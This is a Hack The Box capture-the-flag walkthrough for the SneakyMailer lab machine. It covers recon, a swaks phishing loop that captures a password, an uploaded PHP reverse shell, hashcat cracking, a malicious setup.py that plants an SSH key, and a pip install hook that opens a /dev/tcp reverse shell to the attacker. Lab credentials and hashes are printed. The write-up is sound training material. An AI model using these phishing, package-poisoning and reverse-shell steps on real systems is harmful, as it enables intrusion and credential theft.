Hack-The-Box-walkthrough[SneakyMailer]

Posted on Edited on In Views: Word count in article: 2.8k Reading time ≈ 10 mins.

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 11 Jul 2020
IP: 10.10.10.197

User Blood image InfoSecJack 00 days, 03 hours, 45 mins, 53 seconds.
Root Blood image InfoSecJack 00 days, 03 hours, 48 mins, 41 seconds.

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
root@kali:~# nmap -sV -sC -v -p- --min-rate=10000 10.10.10.197
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
80/tcp   open  http     nginx 1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Employee - Dashboard
143/tcp  open  imap     Courier Imapd (released 2018)
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-14T17:14:21
| Not valid after:  2021-05-14T17:14:21
| MD5:   3faf 4166 f274 83c5 8161 03ed f9c2 0308
|_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-14T17:14:21
| Not valid after:  2021-05-14T17:14:21
| MD5:   3faf 4166 f274 83c5 8161 03ed f9c2 0308
|_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
| http-methods: 
|_  Supported Methods: HEAD
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

visit

1
http://10.10.10.179 -> get redirect to http://sneakycorp.htb/

add sneakycorp to /etc/hosts:

1
10.10.10.197    sneakycorp.htb

bruteforce subdomains:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@kali:~/hackthebox/machine/SneakyMailer# ./ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb" -fs 185

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://sneakycorp.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.sneakycorp.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response size: 185
________________________________________________

dev                     [Status: 200, Size: 13737, Words: 4007, Lines: 341]

then add dev.sneakycorp.htb to /etc/hosts

1
10.10.10.197       sneakycorp.htb  dev.sneakycorp.htb

visit

1
http://sneakycorp.htb/team.php

get a lot of mails extract them to mails.txt
boxname = sneakymail, may have to send some mails

start nc:

1
2
3
4
root@kali:~# nc -lvp 80
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80

send mails:

1
while read mail; do swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials / Errors" --body "goto http://10.10.14.4/" --server 10.10.10.197; done < mails.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
root@kali:~/hackthebox/machine/SneakyMailer# cat mails.txt
airisatou@sneakymailer.htb
angelicaramos@sneakymailer.htb
ashtoncox@sneakymailer.htb
bradleygreer@sneakymailer.htb
brendenwagner@sneakymailer.htb
briellewilliamson@sneakymailer.htb
brunonash@sneakymailer.htb
caesarvance@sneakymailer.htb
carastevens@sneakymailer.htb
cedrickelly@sneakymailer.htb
chardemarshall@sneakymailer.htb
colleenhurst@sneakymailer.htb
dairios@sneakymailer.htb
donnasnider@sneakymailer.htb
doriswilder@sneakymailer.htb
finncamacho@sneakymailer.htb
fionagreen@sneakymailer.htb
garrettwinters@sneakymailer.htb
gavincortez@sneakymailer.htb
gavinjoyce@sneakymailer.htb
glorialittle@sneakymailer.htb
haleykennedy@sneakymailer.htb
hermionebutler@sneakymailer.htb
herrodchandler@sneakymailer.htb
hopefuentes@sneakymailer.htb
howardhatfield@sneakymailer.htb
jacksonbradshaw@sneakymailer.htb
jenagaines@sneakymailer.htb
jenettecaldwell@sneakymailer.htb
jenniferacosta@sneakymailer.htb
jenniferchang@sneakymailer.htb
jonasalexander@sneakymailer.htb
laelgreer@sneakymailer.htb
martenamccray@sneakymailer.htb
michaelsilva@sneakymailer.htb
michellehouse@sneakymailer.htb
olivialiang@sneakymailer.htb
paulbyrd@sneakymailer.htb
prescottbartlett@sneakymailer.htb
quinnflynn@sneakymailer.htb
rhonadavidson@sneakymailer.htb
sakurayamamoto@sneakymailer.htb
sergebaldwin@sneakymailer.htb
shaddecker@sneakymailer.htb
shouitou@sneakymailer.htb
sonyafrost@sneakymailer.htb
sukiburks@sneakymailer.htb
sulcud@sneakymailer.htb
tatyanafitzpatrick@sneakymailer.htb
thorwalton@sneakymailer.htb
tigernixon@sneakymailer.htb
timothymooney@sneakymailer.htb
unitybutler@sneakymailer.htb
vivianharrell@sneakymailer.htb
yuriberry@sneakymailer.htb
zenaidafrank@sneakymailer.htb

after a while i recived the response

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali:~# nc -lvp 80
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.10.10.197.
Ncat: Connection from 10.10.10.197:57330.
POST / HTTP/1.1
Host: 10.10.14.4
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

then decode the string

1
firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

then we got

1
2
3
mail: paulbyrd@sneakymailer.htb
user: paulbyrd
password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

install evolution

1
apt-get install evolution

enter creds for smtp server 10.10.10.197 and mail paulbyrd@sneakymailer.htb

then go to look sent items

we got the following items

  • mail 1:
1
2
3
4
5
6
7
8
9
10
发件人:	Paul Byrd <paulbyrd@sneakymailer.htb>
收件人:	low@debian
主题:	Module testing
日期:	Wed, 27 May 2020 13:28:58 -0400

Hello low


Your current task is to install, test and then erase every python module you 
find in our PyPI service, let me know if you have any inconvenience.
  • mail 2:
1
2
3
4
5
6
7
8
9
10
11
发件人:	Paul Byrd <paulbyrd@sneakymailer.htb>
收件人:	root <root@debian>
主题:	Password reset
日期:	Fri, 15 May 2020 13:03:37 -0500 (2020年05月15日 14时03分37秒)

Hello administrator, I want to change this password for the developer account
 
Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
 
Please notify me when you do it

getshell

try creds on ftp: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root@kali:~/hackthebox/machine/SneakyMailer# ftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:root): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    8 0        1001         4096 Jul 12 02:47 dev
226 Directory send OK.
ftp> cd dev
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 May 26 19:52 css
drwxr-xr-x    2 0        0            4096 May 26 19:52 img
-rwxr-xr-x    1 0        0           13742 Jun 23 09:44 index.php
drwxr-xr-x    3 0        0            4096 May 26 19:52 js
drwxr-xr-x    2 0        0            4096 May 26 19:52 pypi
drwxr-xr-x    4 0        0            4096 May 26 19:52 scss
-rwxr-xr-x    1 0        0           26523 May 26 20:58 team.php
drwxr-xr-x    8 0        0            4096 May 26 19:52 vendor
226 Directory send OK.

then upload the phpreverseshell to the dictionary

1
2
3
4
5
6
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5492 bytes sent in 0.00 secs (59.5179 MB/s)

browser to the following url:

1
http://dev.sneakycorp.htb/shell.php

start nc listener

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@kali:~# nc -lvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.197.
Ncat: Connection from 10.10.10.197:59722.
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
 05:37:19 up  4:05,  0 users,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@sneakymailer:/$ su developer
su developer
Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

developer@sneakymailer:/$ id
id
uid=1001(developer) gid=1001(developer) groups=1001(developer)
developer@sneakymailer:/$ whoami
whoami
developer

let’s still gather more information:

1
2
3
developer@sneakymailer:/var/www$ ls
ls
dev.sneakycorp.htb  html  pypi.sneakycorp.htb  sneakycorp.htb

let’s again edit the /etc/hosts file

1
10.10.10.197    sneakycorp.htb dev.sneakycorp.htb pypi.sneakycorp.htb

visit url: 

1
http://pypi.sneakycorp.htb:8080/

then we got this

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Welcome to pypiserver!

This is a PyPI compatible package index serving 0 packages.

To use this server with pip, run the following command:

        pip install --index-url http://pypi.sneakycorp.htb/simple/ PACKAGE [PACKAGE2...]
      

To use this server with easy_install, run the following command:

        easy_install --index-url http://pypi.sneakycorp.htb/simple/ PACKAGE [PACKAGE2...]
      

The complete list of all packages can be found here or via the simple index.

This instance is running version 1.3.2 of the pypiserver software.

find a hash in the webfolder for pypi:

1
2
3
developer@sneakymailer:/var/www$ cat /var/www/pypi.sneakycorp.htb/.htpasswd
cat /var/www/pypi.sneakycorp.htb/.htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

hashcat to crack it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
hash type:   1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)            | HTTP, SMTP, LDAP Server

D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -a 0 -m 1600 password.txt rockyou.txt

$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Hash.Target......: $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Time.Started.....: Sun Jul 12 17:54:53 2020 (3 secs)
Time.Estimated...: Sun Jul 12 17:54:56 2020 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1306.8 kH/s (12.93ms) @ Accel:256 Loops:250 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 3670016/14344360 (25.59%)
Rejected.........: 0/3670016 (0.00%)
Restore.Point....: 3538944/14344360 (24.67%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidates.#1....: stefy.emin -> sn7594
Hardware.Mon.#1..: N/A

Started: Sun Jul 12 17:54:46 2020
Stopped: Sun Jul 12 17:54:58 2020

then we got the password

1
soufianeelhaoui

with this password we can now create a package and upload it (like seen on webpage):

first go to tmp and create a package directory:

1
2
cd /tmp
mkdir mypkg

then create .pypirc file: 

1
2
3
4
5
6
7
[distutils]
index-servers = local

[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui

then use scp to transfer the file:

1
2
3
4
5
6
7
8
9
10
11
developer@sneakymailer:/tmp/mypkg$ scp root@10.10.14.4:/root/hackthebox/machine/SneakyMailer/.pypirc .
<4.4:/root/hackthebox/machine/SneakyMailer/.pypirc .
Could not create directory '/var/www/dev.sneakycorp.htb/.ssh'.
The authenticity of host '10.10.14.4 (10.10.14.4)' can't be established.
ECDSA key fingerprint is SHA256:TA8zjlhAspZEc/3WZjyWRQBxzPfwJXE2X98JsMGnz6U.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/var/www/dev.sneakycorp.htb/.ssh/known_hosts).
root@10.10.14.4's password: 2525

.pypirc                                       100%  128     0.4KB/s   00:00

change permissions: 

1
2
3
4
5
6
7
8
developer@sneakymailer:/tmp/mypkg$ chmod 600 .pypirc
chmod 600 .pypirc
developer@sneakymailer:/tmp/mypkg$ ls -la
ls -la
total 12
drwxrwxrwx  2 developer developer 4096 Jul 12 07:09 .
drwxrwxrwt 10 root      root      4096 Jul 12 07:09 ..
-rw-------  1 developer developer  128 Jul 12 07:09 .pypirc

create a key, which can then add to authorized keys:

1
2
3
4
5
root@kali:~/hackthebox/machine/SneakyMailer# ssh-keygen -b 2048 -t ed25519 -f ./key -q -N ""
root@kali:~/hackthebox/machine/SneakyMailer# ls
ffuf  key  key.pub  mails.txt  shell.php
root@kali:~/hackthebox/machine/SneakyMailer# cat key.pub 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMM20bpCOUwHR4+8hMegW7FanYYPdA6yJZ1OIniwUDXn root@kali

create the file “setup.py”:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import setuptools

try:
	with open("/home/low/.ssh/authorized_keys", "a") as f:
		f.write("\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMM20bpCOUwHR4+8hMegW7FanYYPdA6yJZ1OIniwUDXn root@kali")
		f.close()
except Exception as e:
	pass
setuptools.setup(
	name="example-pkg3", # Replace with your own username
	version="0.0.1",
	author="Example Author",
	author_email="author@example.com",
	description="A small example package",
	long_description="",
	long_description_content_type="text/markdown",
	url="https://github.com/pypa/sampleproject",
	packages=setuptools.find_packages(),
	classifiers=[
		"Programming Language :: Python :: 3",
		"License :: OSI Approved :: MIT License",
		"Operating System :: OS Independent",
	],
)

then use scp to transfer it:

1
2
3
4
5
6
7
8
9
10
11
developer@sneakymailer:/tmp/mypkg$ scp root@10.10.14.4:/root/hackthebox/machine/SneakyMailer/setup.py .
<.4:/root/hackthebox/machine/SneakyMailer/setup.py .
Could not create directory '/var/www/dev.sneakycorp.htb/.ssh'.
The authenticity of host '10.10.14.4 (10.10.14.4)' can't be established.
ECDSA key fingerprint is SHA256:TA8zjlhAspZEc/3WZjyWRQBxzPfwJXE2X98JsMGnz6U.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/var/www/dev.sneakycorp.htb/.ssh/known_hosts).
root@10.10.14.4's password: 2525

setup.py                                      100%  720     0.7KB/s   00:00

change HOME environment so that .pypirc can be used and run the setup.py: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
developer@sneakymailer:/tmp/mypkg$ chmod 777 setup.py
chmod 777 setup.py
developer@sneakymailer:/tmp/mypkg$ HOME=$(pwd)
HOME=$(pwd)
developer@sneakymailer:~$ python3 setup.py sdist register -r local upload -r local
<n3 setup.py sdist register -r local upload -r local
running sdist
running egg_info
creating example_pkg3.egg-info
writing example_pkg3.egg-info/PKG-INFO
writing dependency_links to example_pkg3.egg-info/dependency_links.txt
writing top-level names to example_pkg3.egg-info/top_level.txt
writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
reading manifest file 'example_pkg3.egg-info/SOURCES.txt'
writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
warning: sdist: standard file not found: should have one of README, README.rst, README.txt, README.md

running check
creating example-pkg3-0.0.1
creating example-pkg3-0.0.1/example_pkg3.egg-info
copying files to example-pkg3-0.0.1...
copying setup.py -> example-pkg3-0.0.1
copying example_pkg3.egg-info/PKG-INFO -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/SOURCES.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/dependency_links.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/top_level.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
Writing example-pkg3-0.0.1/setup.cfg
creating dist
Creating tar archive
removing 'example-pkg3-0.0.1' (and everything under it)
running register
Registering example-pkg3 to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Registering is deprecated, use twine to upload instead (https://pypi.org/p/twine/)
running upload
Submitting dist/example-pkg3-0.0.1.tar.gz to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Uploading via this command is deprecated, use twine to upload instead (https://pypi.org/p/twine/)

now login with ssh as low:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali:~/hackthebox/machine/SneakyMailer# chmod 700 key
root@kali:~/hackthebox/machine/SneakyMailer# ssh -i key low@10.10.10.197
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Tue Jun  9 03:02:52 2020 from 192.168.56.105
low@sneakymailer:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
low@sneakymailer:~$ whoami
low

then we got user.txt

1
2
3
4
low@sneakymailer:~$ ls
user.txt  venv
low@sneakymailer:~$ cat user.txt
92d8adff6a2d3da02673a9fb6aa471a4

privilege esclation

run the following command

1
2
3
4
5
6
7
low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
                                                                                                                                   
User low may run the following commands on sneakymailer:                                                                           
    (root) NOPASSWD: /usr/bin/pip3

let’s cd to /dev/shm, then create a python script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from setuptools import setup
from setuptools.command.install import install
import base64
import os
class CustomInstall(install):
	def run(self):
		install.run(self)
		os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9002 0>&1'")
setup(
		name='FakePip',
		version='0.0.1',
		description='This will exploit a sudoer able to /usr/bin/pip install *',
		url='https://github.com/0x00-0x00/fakepip',
		author='zc00l',
		author_email='andre.marques@esecurity.com.br',
		license='MIT',
		zip_safe=False,
		cmdclass={'install': CustomInstall})

run the following payload

1
2
3
4
5
low@sneakymailer:/dev/shm$ sudo /usr/bin/pip3 install . --upgrade --force-reinstall
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /dev/shm
Building wheels for collected packages: FakePip
  Running setup.py bdist_wheel for FakePip ... -

start nc to listen on 9002 port:

then we got root!!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@kali:~# nc -lvp 9002
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002
Ncat: Connection from 10.10.10.197.
Ncat: Connection from 10.10.10.197:40898.
root@sneakymailer:/tmp/pip-req-build-ht66bwjk# id
id
uid=0(root) gid=0(root) groups=0(root)
root@sneakymailer:/tmp/pip-req-build-ht66bwjk# whoami
whoami
root
root@sneakymailer:/tmp/pip-req-build-ht66bwjk# cd /root
cd /root
root@sneakymailer:~# ls
ls
root.txt
root@sneakymailer:~# cat root.txt
cat root.txt
464554578c27d528fb9c5710ec3de868

  • the root hash to unlock other writeups:

1
root:$6$jJW2Iy0Knfw7c6gr$/p2MAEhr7Fy4bMIT8szzgnSkL2kp8EaPKvGQ//cfcX0bMnazYHzNwWIsGaGwgceFyftI2Xihj0rrhUbfkrzhf.:18402:0:99999:7:::

Summary of knowledge

  • subdomain fuzz
  • swaks to test email and got credentials
  • evolution email tools usage
  • pypiserver hash crack
  • create py script to get pypiserver privesc through ssh key poison
  • scp transfer files
  • use pip3 privesc to root

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…